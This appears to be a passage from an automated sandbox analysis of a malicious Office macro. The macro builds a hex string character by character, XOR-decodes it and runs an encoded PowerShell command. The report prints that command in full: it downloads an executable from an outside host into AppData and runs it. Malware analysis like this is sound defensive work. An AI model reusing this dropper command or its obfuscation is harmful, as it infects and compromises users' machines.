                                                663

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                664

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                665

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                666

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                667

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                668

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                669

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                670

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                671

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                672

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                673

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                674

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                675

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                676

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                677

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                678

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                679

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                680

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                681

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                682

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                683

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                684

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                685

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                686

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                687

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                688

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                689

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                690

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                691

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                692

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                693

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                694

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                695

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                696

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                697

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                698

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                699

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                700

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                701

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                702

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                703

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                704

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                705

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                706

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                707

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                708

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                709

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                710

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                711

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                712

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"

                                                713

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                714

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                715

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                716

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                717

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                718

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                719

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                720

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                721

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                722

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                723

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                724

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                725

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                726

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                727

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                728

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"

                                                729

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                730

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                731

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                732

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                733

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                734

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                735

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                736

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                737

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                738

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                739

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                740

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                741

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                742

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                743

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                744

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                745

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                746

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                747

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                748

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                749

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                750

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                751

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                752

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                753

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                754

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                755

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                756

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                757

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                758

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                759

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                760

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                761

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                762

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                763

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                764

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                765

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                766

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                767

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                768

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                769

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                770

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                771

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                772

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                773

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                774

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                775

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                776

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                777

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                778

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                779

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                780

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                781

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                782

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"

                                                783

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                784

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                785

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                786

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                787

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                788

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                789

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                790

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                791

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                792

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"

                                                793

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                794

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                795

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                796

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                797

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                798

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"

                                                799

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                800

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                801

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                802

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                803

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                804

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"

                                                805

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                806

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                807

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                808

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                809

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                810

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                811

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                812

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                813

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                814

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                815

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                816

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                817

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                818

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                819

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                820

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                821

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                822

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                823

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                824

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"

                                                825

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                826

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                827

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                828

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                829

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                830

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                831

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                832

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                833

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                834

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                835

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                836

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"

                                                837

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                838

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                839

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                840

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"

                                                841

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                842

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                843

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                844

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                845

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                846

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                847

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                848

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                849

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                850

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                851

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                852

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                853

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                854

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                855

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                856

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                857

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                858

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                859

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                860

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                861

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                862

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "A"

                                                863

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                864

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                865

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                866

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                867

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                868

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                869

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                870

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                871

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                872

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                873

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                874

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                875

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                876

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                877

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                878

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"

                                                879

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                880

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                881

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                882

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "7"

                                                883

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"

                                                884

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                885

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                886

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                887

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                888

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                889

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                890

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                891

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                892

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                893

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                894

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"

                                                895

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                896

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                897

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                898

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                899

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                900

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                901

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                902

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                903

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                904

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                905

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                906

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                907

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                908

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                909

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                910

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                911

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                912

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                913

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                914

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                915

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                916

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                917

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                918

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                919

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                920

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"

                                                921

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                922

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                923

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                924

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                925

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                926

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"

                                                927

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                928

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                929

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                930

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"

                                                931

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"

                                                932

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"

                                                933

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"

                                                934

                                                PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"

                                                936

                                                x = sssssss("a", PzJjQLNaCwSTDGq)

                                                937

                                                End Sub

                                                Function sssssss, APIs: 8, Strings: 2, Number of lines: 13, Relevance: 22.763
                                                APIsMeta Information

                                                Len

                                                		Len("020C05414E0241110E1604131209040D0D4F041904414C040F020E050405220E0C0C000F05412A20232E202634200516201520245920380623102026342038162351202220203506230D202930202D0623392026342038062325202616200030230D202655200520201120225520332023172029022003062312202659203830230A2024382000302312202634202A20200F2026062005202351202920202E0620172022592002162316202634203816230C20261620031623172029282002162014202655203B302351202259203B20230D202938202D1623112026552038162317202651203B302014202634200420230D202202202D20200E202230203B302314202938202E062309202920200220230A202624200520230920220A202A16200F202716200520232E2024302033062355202255203B302355202634202B162011202512203416235120262420020623512022512034162312202634203B302316202220202C062056202220203416235120262420020623512022512034202318202659203816230D20292C2002162006202230203B302314202938202E062309202920200220230A2026242005202309202716200520232E2024302033062355202255203B30235520263420") -> 924

                                                Val

                                                Mid$

                                                Asc

                                                Mid$

                                                Len

                                                		Len("a") -> 1

                                                Chr

                                                Shell

                                                		Shell("cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA") -> 2028
                                                StringsDecrypted Strings
                                                "&H"
                                                "&H"
                                                LineInstructionMeta Information
                                                938

                                                Public Function sssssss(CodeKey as String, DataIn as String) as String

                                                939

                                                Dim lonDataPtr as Long

                                                executed
                                                940

                                                Dim strDataOut as String

                                                941

                                                Dim intXOrValue1 as Integer

                                                942

                                                Dim intXOrValue2 as Integer

                                                943

                                                For lonDataPtr = 1 To (Len(DataIn) / 2)

                                                Len("020C05414E0241110E1604131209040D0D4F041904414C040F020E050405220E0C0C000F05412A20232E202634200516201520245920380623102026342038162351202220203506230D202930202D0623392026342038062325202616200030230D202655200520201120225520332023172029022003062312202659203830230A2024382000302312202634202A20200F2026062005202351202920202E0620172022592002162316202634203816230C20261620031623172029282002162014202655203B302351202259203B20230D202938202D1623112026552038162317202651203B302014202634200420230D202202202D20200E202230203B302314202938202E062309202920200220230A202624200520230920220A202A16200F202716200520232E2024302033062355202255203B302355202634202B162011202512203416235120262420020623512022512034162312202634203B302316202220202C062056202220203416235120262420020623512022512034202318202659203816230D20292C2002162006202230203B302314202938202E062309202920200220230A2026242005202309202716200520232E2024302033062355202255203B30235520263420") -> 924

                                                executed
                                                944

                                                intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))

                                                Val

                                                Mid$

                                                945

                                                intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))

                                                Asc

                                                Mid$

                                                Len("a") -> 1

                                                executed
                                                946

                                                strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)

                                                Chr

                                                947

                                                Next lonDataPtr

                                                Len("020C05414E0241110E1604131209040D0D4F041904414C040F020E050405220E0C0C000F05412A20232E202634200516201520245920380623102026342038162351202220203506230D202930202D0623392026342038062325202616200030230D202655200520201120225520332023172029022003062312202659203830230A2024382000302312202634202A20200F2026062005202351202920202E0620172022592002162316202634203816230C20261620031623172029282002162014202655203B302351202259203B20230D202938202D1623112026552038162317202651203B302014202634200420230D202202202D20200E202230203B302314202938202E062309202920200220230A202624200520230920220A202A16200F202716200520232E2024302033062355202255203B302355202634202B162011202512203416235120262420020623512022512034162312202634203B302316202220202C062056202220203416235120262420020623512022512034202318202659203816230D20292C2002162006202230203B302314202938202E062309202920200220230A2026242005202309202716200520232E2024302033062355202255203B30235520263420") -> 924

                                                executed
                                                948

                                                sssssss = strDataOut

                                                949

                                                retval = Shell(sssssss)

                                                Shell("cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA") -> 2028

                                                executed
                                                950

                                                End Function

                                                Reset < >

                                                  Analysis Process: powershell.exe PID: 1320 Parent PID: 2028 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 000007FF002706E5, Relevance: .2, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2117135077.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5ae1e149fe05b71ba298596e143b9a8e6dea67a493c022f9ecec300974b2bc2
                                                  • Instruction ID: 8d9214ce0039142a728998813b2ae057fbb791663fd8b4ff05f3196a1ceb8d37
